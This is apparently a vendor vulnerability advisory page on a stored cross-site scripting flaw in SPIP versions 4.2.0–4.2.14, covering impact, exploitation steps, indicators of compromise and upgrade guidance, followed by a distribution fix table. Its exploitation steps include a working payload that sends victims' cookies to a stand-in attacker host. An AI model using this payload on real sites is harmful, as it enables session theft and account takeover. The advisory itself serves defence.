CVE-2025-71240
NixOS vulnerability analysis and mitigation

Overview

CVE-2025-71240 is a Cross-Site Scripting (XSS) vulnerability in SPIP, an open-source web publishing system, affecting versions 4.2.0 through 4.2.14 (fixed in 4.2.15). The flaw allows authenticated attackers to inject malicious JavaScript via crafted content within HTML <code> tags, which then executes in a victim's browser. It was published on February 19, 2026, and carries a CVSS v3.1 base score of 5.4 (Medium) (Feedly, Tenable).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). SPIP fails to properly sanitize or validate JavaScript content embedded within HTML <code> tags during web page generation, allowing an attacker with low-privileged access to inject scripts that are later rendered and executed in other users' browsers. The attack vector is network-based, requires low privileges, and necessitates user interaction (a victim viewing the malicious content) (Feedly, InfinitSec).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of a victim's browser session, potentially leading to session token theft, credential harvesting, unauthorized actions performed on behalf of the victim, and defacement of content visible to other users. The scope is changed (impacts extend beyond the vulnerable component), with low confidentiality and integrity impacts and no direct availability impact. The vulnerability does not provide direct server-side code execution or lateral movement capability, but stolen session cookies could enable account takeover (Feedly).

Exploitability

No public exploit code or active in-the-wild exploitation has been reported for CVE-2025-71240 as of the available data. The EPSS score is approximately 0.029% (0.000290), indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Detection coverage exists via Tenable Nessus plugin 299640 (Tenable, Feedly).

Exploitation steps

  1. Reconnaissance: Identify a SPIP instance running version 4.2.0–4.2.14 (e.g., by inspecting HTTP response headers, meta tags, or the SPIP login page for version disclosure).
  2. Obtain low-privileged access: Register or log in as a low-privileged user (e.g., contributor or author) on the target SPIP site.
  3. Craft malicious payload: Create content containing a <code> tag with embedded JavaScript, such as <code><script>document.location='https://attacker.com/steal?c='+document.cookie</script></code>, exploiting the lack of JavaScript validation within code tags.
  4. Submit content: Publish or submit the crafted content to a page, article, or comment section that other users (including administrators) will view.
  5. Trigger execution: When a victim visits the page containing the injected content, the malicious script executes in their browser, potentially stealing session cookies or performing actions on their behalf (InfinitSec, Feedly).

Indicators of compromise

  • Logs: SPIP access logs showing POST requests to article/content submission endpoints containing <code> tags with <script> or JavaScript event handlers (e.g., onerror, onload) in the body.
  • Network: Outbound HTTP requests from victim browsers to unexpected external domains shortly after visiting SPIP-hosted pages (potential data exfiltration via XSS).
  • File System: Unexpected modifications to SPIP content or template files if an attacker leveraged a stolen admin session to persist malicious scripts.
  • Logs: Browser-side console errors or CSP violation reports referencing inline script execution on SPIP pages.

Mitigation and workarounds

Upgrade SPIP to version 4.2.15 or later, which includes the fix for improper JavaScript validation within <code> tags. No specific configuration-based workaround has been publicly documented; upgrading is the recommended and primary remediation. Organizations should also enforce a Content Security Policy (CSP) header to limit the impact of any XSS vulnerabilities, and restrict content submission to trusted users where possible (Feedly, Tenable).

Community reactions

Coverage of CVE-2025-71240 has been limited to vulnerability databases and security tooling, with no notable vendor statements, researcher commentary, or significant social media discussion identified. Tenable added detection support via Nessus plugin 299640, and InfinitSec published a brief technical post describing the vulnerability (InfinitSec, Tenable).

Additional resources

Linux Distribution fix status

Fix availability across major Linux distributions and their releases.

Debian

Fixed

sid

spip: 4.3.0+dfsg-1

Fixed

trixie

spip: 4.3.0+dfsg-1

Fixed

Ubuntu

Unknown

bionic (esm-apps)

spip

Unknown

devel

spip

Not Affected

focal (esm-apps)

spip

Unknown

jammy

spip

Unknown

jammy (esm-apps)

spip

Unknown

noble

spip

Unknown

noble (esm-apps)

spip

Unknown

questing

spip

Not Affected

SourceThis report was generated using AI

Related NixOS vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-86738CRITICAL9.3
  • NixOS logoNixOS
  • snipe-it
NoYesSep 08, 2026
CVE-2026-86734HIGH7.1
  • NixOS logoNixOS
  • snipe-it
NoYesSep 08, 2026
CVE-2026-86735MEDIUM5.9
  • NixOS logoNixOS
  • snipe-it
NoYesSep 08, 2026
CVE-2026-86737MEDIUM5.3
  • NixOS logoNixOS
  • snipe-it
NoYesSep 08, 2026
CVE-2026-86736MEDIUM5.3
  • NixOS logoNixOS
  • snipe-it
NoYesSep 08, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management